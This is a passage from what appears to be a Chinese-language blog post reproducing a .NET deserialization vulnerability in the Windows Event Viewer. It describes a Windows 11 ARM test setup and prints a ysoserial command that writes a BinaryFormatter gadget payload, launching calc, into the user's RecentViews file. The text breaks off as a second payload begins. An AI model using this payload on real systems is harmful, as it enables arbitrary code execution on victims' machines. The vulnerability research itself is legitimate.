0x01. 漏洞描述
4月26日在twitter上看到Orange师傅发布了个windows事件查看器的 .Net 反序列化漏洞,感觉有点意思,故抽空简单做个复现与分析。
0x02. 漏洞复现
- 测试环境:Windows 11,ARM版
作者给的payload:
ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%\Microsoft\Eventv~1\RecentViews
其中,%LOCALAPPDATA% 对应路径为:C:\Users\xxx\AppData\Local,xxx为用户名,
不过本人机器上并没有 Eventv~1 这个目录,遂用 Event Viewer 目录代替,经测试也可以成功。
对应Payload为:
ysoseri